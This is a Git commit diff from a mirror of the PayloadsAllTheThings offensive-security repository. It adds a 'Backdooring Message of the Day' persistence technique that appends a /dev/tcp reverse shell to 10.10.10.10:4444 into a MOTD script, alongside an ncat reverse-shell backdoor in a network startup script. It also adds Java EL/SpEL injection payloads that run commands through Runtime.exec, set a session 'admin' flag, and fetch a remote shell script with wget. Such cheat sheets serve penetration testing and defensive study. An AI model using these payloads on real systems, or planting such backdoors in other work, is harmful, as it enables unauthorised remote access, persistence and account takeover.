mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
MOTD + SpEL injection
This commit is contained in:
parent
d3ccbb5370
commit
a38701a7e2
@ -5,10 +5,11 @@
|
|||||||
* [Basic reverse shell](#basic-reverse-shell)
|
* [Basic reverse shell](#basic-reverse-shell)
|
||||||
* [Add a root user](#add-a-root-user)
|
* [Add a root user](#add-a-root-user)
|
||||||
* [Suid Binary](#suid-binary)
|
* [Suid Binary](#suid-binary)
|
||||||
* [Crontab - Reverse shell](#crontab-reverse-shell)
|
* [Crontab - Reverse shell](#crontab---reverse-shell)
|
||||||
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
|
* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc)
|
||||||
* [Backdooring a startup service](#backdoor-a-startup-service)
|
* [Backdooring a startup service](#backdooring-a-startup-service)
|
||||||
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
|
* [Backdooring a user startup file](#backdooring-a-user-startup-file)
|
||||||
|
* [Backdooring Message of the Day](#backdooring-message-of-the-day)
|
||||||
* [Backdooring a driver](#backdooring-a-driver)
|
* [Backdooring a driver](#backdooring-a-driver)
|
||||||
* [Backdooring the APT](#backdooring-the-apt)
|
* [Backdooring the APT](#backdooring-the-apt)
|
||||||
* [Backdooring the SSH](#backdooring-the-ssh)
|
* [Backdooring the SSH](#backdooring-the-ssh)
|
||||||
@ -90,11 +91,21 @@ echo $sudopass >> /tmp/pass.txt
|
|||||||
|
|
||||||
## Backdooring a startup service
|
## Backdooring a startup service
|
||||||
|
|
||||||
|
* Edit `/etc/network/if-up.d/upstart` file
|
||||||
```bash
|
```bash
|
||||||
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
|
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
|
||||||
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
|
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Backdooring Message of the Day
|
||||||
|
|
||||||
|
* Edit `/etc/update-motd.d/00-header` file
|
||||||
|
```bash
|
||||||
|
echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Backdooring a user startup file
|
## Backdooring a user startup file
|
||||||
|
|
||||||
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
|
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
|
||||||
|
@ -145,8 +145,23 @@ ${{<%[%'"}}%\.
|
|||||||
### Expression Language EL - Basic injection
|
### Expression Language EL - Basic injection
|
||||||
|
|
||||||
```java
|
```java
|
||||||
|
${<property>}
|
||||||
${1+1}
|
${1+1}
|
||||||
|
|
||||||
|
#{<expression string>}
|
||||||
#{1+1}
|
#{1+1}
|
||||||
|
|
||||||
|
T(<javaclass>)
|
||||||
|
```
|
||||||
|
|
||||||
|
### Expression Language EL - Properties
|
||||||
|
|
||||||
|
* Interesting properties to access `String`, `java.lang.Runtime`
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
${2.class}
|
||||||
|
${2.class.forName("java.lang.String")}
|
||||||
|
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Expression Language EL - One-Liner injections not including code execution
|
### Expression Language EL - One-Liner injections not including code execution
|
||||||
@ -157,6 +172,9 @@ ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClas
|
|||||||
|
|
||||||
// JVM System Property Lookup (ex: java.class.path)
|
// JVM System Property Lookup (ex: java.class.path)
|
||||||
${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
|
${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
|
||||||
|
|
||||||
|
// Modify session attributes
|
||||||
|
${pageContext.request.getSession().setAttribute("admin",true)}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Expression Language EL - Code Execution
|
### Expression Language EL - Code Execution
|
||||||
@ -181,10 +199,14 @@ ${request.getAttribute("a")}
|
|||||||
|
|
||||||
// Method using Reflection & Invoke
|
// Method using Reflection & Invoke
|
||||||
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
|
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
|
||||||
|
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
|
||||||
|
|
||||||
// Method using ScriptEngineManager one-liner
|
// Method using ScriptEngineManager one-liner
|
||||||
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
|
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
|
||||||
|
|
||||||
|
// Method using JavaClass
|
||||||
|
T(java.lang.Runtime).getRuntime().exec('whoami').x
|
||||||
|
|
||||||
// Method using ScriptEngineManager
|
// Method using ScriptEngineManager
|
||||||
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
||||||
```
|
```
|
||||||
@ -1132,3 +1154,6 @@ layout template:
|
|||||||
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
||||||
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
|
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
|
||||||
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
|
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
|
||||||
|
* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
|
||||||
|
* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
|
||||||
|
* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
|
||||||
|
Loading…
Reference in New Issue
Block a user